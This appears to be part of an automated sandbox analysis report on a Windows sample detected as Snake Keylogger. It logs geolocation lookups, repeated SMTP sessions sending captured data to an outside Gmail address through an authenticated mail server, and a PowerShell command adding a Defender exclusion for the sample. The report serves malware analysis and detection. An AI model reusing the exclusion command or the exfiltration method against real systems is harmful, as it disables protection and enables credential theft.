            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0L0XQQVNmpq%2BkdS0W4hKcCWOMITM5F%2FXZ8Or1gzdxB4t41FPlHgIy8wdroR%2Fd1T5wwiGGBNGzD86TQBduB4yCYwldnvcJA3SVTh1Zd6sqiwrhD5khLZAE2X2g8xBH1FR52qLJs6b"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bc43d174308-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:10 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            5 | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:11 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:11 UTC | 707 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:11 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9364
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzRIKNbsHy7byMrrAY1RYvd2EK8%2FQSSPVd2dx1R6LfZIkX1SU%2BSymudBZRMF1C4XmzmskyR%2FOAarJ1ETpCWuQUeW%2BjhAfOcbxChyOKnJhyCcsKXd4o01WGTkP19TqhTKvukEbZhV"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bcc481e17f1-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:11 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            6 | 192.168.2.5 | 49721 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:12 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:12 UTC | 705 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:12 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9365
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NZ080nqmOzDt0xZhhHOycuUI4bL9hL1OPAvA0jTMk1RS5WndVL5d2DxlGrcyIVIKOQjOFZTYwafp%2BZcWFx7afGtledOtyW23mexYXGzPTdEt01IOfWAuAfSi7vE%2F4DxyaFj13%2F3U"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bd54ac11a24-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:12 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            7 | 192.168.2.5 | 49723 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:13 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:14 UTC | 701 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:14 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9367
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kFNXKqpSjLLa5U7n7SVNpYeoecQbs9FaPYUFFzxYBuT2xNUBypgPEIYo3bb1FIe3RAx37MEJvx7nlbXXK6hDe72aM5O69iRzaLpxfaRdULEwNtOKEcv7hY44Q%2FNfjlDPgyplmUgD"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bdcec577280-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:14 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
            Jul 26, 2024 11:39:21.493563890 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:21 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:21.493731976 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7 | EHLO 347688
            Jul 26, 2024 11:39:21.728148937 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:21.730078936 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7 | AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:21.964288950 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:22.267419100 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 235 Authentication succeeded
            Jul 26, 2024 11:39:22.267713070 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7 | MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:22.501398087 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 250 OK
            Jul 26, 2024 11:39:22.502785921 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7 | RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:22.739942074 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 250 Accepted
            Jul 26, 2024 11:39:22.740250111 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7 | DATA
            Jul 26, 2024 11:39:22.974374056 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:22.975301981 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7 | .
            Jul 26, 2024 11:39:23.389702082 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 250 OK id=1sXHQ2-005kGQ-2B
            Jul 26, 2024 11:39:32.611268044 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7 | QUIT
            Jul 26, 2024 11:39:33.046582937 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5 | 221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:33.713608980 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:33 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:33.713798046 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7 | EHLO 347688
            Jul 26, 2024 11:39:33.950326920 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:33.950932980 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7 | AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:34.187680006 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:34.439315081 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 235 Authentication succeeded
            Jul 26, 2024 11:39:34.439483881 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7 | MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:34.675419092 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 250 OK
            Jul 26, 2024 11:39:34.675558090 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7 | RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:34.915971994 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 250 Accepted
            Jul 26, 2024 11:39:34.916703939 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7 | DATA
            Jul 26, 2024 11:39:35.154544115 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:35.154834032 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7 | .
            Jul 26, 2024 11:39:35.394805908 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 250 OK id=1sXHQE-005kJ9-2k
            Jul 26, 2024 11:39:35.395258904 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7 | QUIT
            Jul 26, 2024 11:39:35.846493006 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5 | 221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:36.504353046 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:36 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:36.504496098 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7 | EHLO 347688
            Jul 26, 2024 11:39:36.739263058 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:36.739579916 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7 | AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:36.975043058 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:37.237426043 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 235 Authentication succeeded
            Jul 26, 2024 11:39:37.237565041 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7 | MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:37.474749088 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 250 OK
            Jul 26, 2024 11:39:37.474888086 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7 | RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:37.713821888 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 250 Accepted
            Jul 26, 2024 11:39:37.713948965 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7 | DATA
            Jul 26, 2024 11:39:37.950402021 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:37.950714111 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7 | .
            Jul 26, 2024 11:39:38.367907047 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 250 OK id=1sXHQH-005kKG-26
            Jul 26, 2024 11:39:38.368346930 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7 | QUIT
            Jul 26, 2024 11:39:38.805028915 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5 | 221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:39.490287066 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:39 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:39.490523100 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7 | EHLO 347688
            Jul 26, 2024 11:39:39.732033014 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:39.732247114 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7 | AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:39.974550009 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:40.234587908 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 235 Authentication succeeded
            Jul 26, 2024 11:39:40.234877110 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7 | MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:40.485876083 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 250 OK
            Jul 26, 2024 11:39:40.492093086 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7 | RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:40.738343000 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 250 Accepted
            Jul 26, 2024 11:39:40.738498926 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7 | DATA
            Jul 26, 2024 11:39:40.981273890 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:40.982223988 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7 | .
            Jul 26, 2024 11:39:41.426445961 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 250 OK id=1sXHQK-005kKr-2B
            Jul 26, 2024 11:39:41.427006006 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7 | QUIT
            Jul 26, 2024 11:39:41.870563030 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5 | 221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:43.123014927 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:42 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:43.123116970 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:42 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:43.123375893 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7 | EHLO 347688
            Jul 26, 2024 11:39:43.123497009 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:42 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:43.359286070 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:43.359458923 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7 | AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:43.600292921 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:43.843796968 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 235 Authentication succeeded
            Jul 26, 2024 11:39:43.844057083 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7 | MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:44.072933912 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 250 OK
            Jul 26, 2024 11:39:44.073223114 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7 | RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:44.309470892 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 250 Accepted
            Jul 26, 2024 11:39:44.309607029 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7 | DATA
            Jul 26, 2024 11:39:44.540345907 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:44.540724993 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7 | .
            Jul 26, 2024 11:39:44.775960922 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 250 OK id=1sXHQO-005kM7-0n
            Jul 26, 2024 11:39:44.776501894 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7 | QUIT
            Jul 26, 2024 11:39:45.208156109 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5 | 221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:45.907793999 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5 | 220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:45 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:45.907948971 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7 | EHLO 347688
            Jul 26, 2024 11:39:46.171327114 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5 | 250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:46.171766996 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7 | AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=


            Target ID:0
            Start time:05:38:57
            Start date:26/07/2024
            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Imagebase:0x1d0000
            File size:516'096 bytes
            MD5 hash:967175D3AA79388FD8E84CCBF0B998C7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
            Reputation:low
            Has exited:true

            Target ID:3
            Start time:05:38:57
            Start date:26/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Imagebase:0x9f0000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:05:38:58
            Start date:26/07/2024
            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Imagebase:0x7f0000
            File size:516'096 bytes
            MD5 hash:967175D3AA79388FD8E84CCBF0B998C7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:low
            Has exited:false

            Target ID:5
            Start time:05:38:58
            Start date:26/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:05:38:59
            Start date:26/07/2024
            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Imagebase:0x7ff6ef0c0000
            File size:496'640 bytes
            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
